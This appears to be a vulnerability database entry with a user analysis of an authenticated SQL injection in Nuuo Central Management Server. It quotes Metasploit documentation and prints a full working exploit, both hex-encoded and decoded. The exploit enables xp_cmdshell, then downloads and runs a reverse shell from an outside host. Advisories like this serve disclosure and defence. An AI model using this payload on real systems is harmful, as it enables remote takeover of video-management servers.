Attacker Value

Moderate

Nuuo Central Management Server Authenticated SQL Server SQLi

Attacker Value

Moderate

(1 user assessed)

Exploitability

Low

(1 user assessed)

User Interaction

Unknown

Privileges Required

Unknown

Attack Vector

Unknown

Nuuo Central Management Server Authenticated SQL Server SQLi

Disclosure Date: November 27, 2018 •Last updated February 13, 2020

MITRE ATT&CK

Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

Nuuo Central Management Server v3.3 and prior are vulnerable to an authenticated SQL injection vulnerability.

Add Assessment

jrobles-r7 (40)

May 09, 2019 5:57pm UTC (5 years ago)•Edited 4 years ago

Ratings

Attacker Value

Medium

Exploitability

Low

Technical Analysis

Details

Details from module documentation in Metasploit.

The GETOPENALARM verb is used to obtain information about alarms stored in the CMS Server database. An example request is below:

GETOPENALARM NUCM/1.0
DeviceID: <number>
SourceServer: <server-id>
LastOne: <number>

The vulnerability is in the “SourceServer” parameter, which allows injection of arbitrary SQL characters, and can be abused to inject SQL into the executing statement. For example the following request:

GETOPENALARM NUCM/1.0
DeviceID: 1
SourceServer: ';drop table bobby;--
LastOne: 3

Will cause the following SQL query to be executed on the server:
SELECT AlarmNo, EventType, DeviceID, Channel, EventDesc, DateTime, PreviewImage, SourceServer, AlarmID, State, Priority, Owner, HistoryNo, PosTransaction, AlarmNote, AlarmType FROM AlarmLog WHERE DeviceID=1 AND SourceServer=“;drop table bobby;— ‘ AND State<20 order by DateTime DESC

Given that SQL Server 2005 Express is used by default (see vulnerability #2), this can be abused to enable xp_cmdshell and achieve remote code execution.

As as example, here is a full working exploit that downloads a reverse shell from http://10.0.99.102/shell.exe and executes it:

';exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; declare @q varchar(8000); select @q=0x78705f636d647368656c6c2027636420433a5c77696e646f77735c74656d705c202626206563686f202473746f726167654469723d24707764203e20776765742e707331202626206563686f2024776562636c69656e74203d204e65772d4f626a6563742053797374656d2e4e65742e576562436c69656e74203e3e20776765742e707331202626206563686f202475726c203d2022687474703a2f2f31302e302e39392e3130322f7368656c6c2e65786522203e3e20776765742e707331202626206563686f202466696c65203d20227368656c6c2e65786522203e3e20776765742e707331202626206563686f2024776562636c69656e742e446f776e6c6f616446696c65282475726c2c2466696c6529203e3e20776765742e70733120262620706f7765727368656c6c2e657865202d457865637574696f6e506f6c69637920427970617373202d4e6f4c6f676f202d4e6f6e496e746572616374697665202d4e6f50726f66696c65202d46696c6520776765742e70733120262620636d64202f6320433a5c77696e646f77735c74656d705c7368656c6c2e65786527; exec (@q);--

The encoded part of the exploit is the following:

xp_cmdshell 'cd C:\windows\temp\ && echo $storageDir=$pwd > wget.ps1 && echo $webclient = New-Object System.Net.WebClient >> wget.ps1 && echo $url = "http://10.0.99.102/shell.exe" >> wget.ps1 && echo $file = "shell.exe" >> wget.ps1 && echo $webclient.DownloadFile($url,$file) >> wget.ps1 && powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 && cmd /c C:\windows\temp\shell.exe'

References

Advisory

CVE-2018-18982 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18982)

Miscellaneous

https://cvedetails.com/cve/CVE-2018-18982

https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02

https://seclists.org/fulldisclosure/2019/Jan/51

https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt

Rapid7

Moderate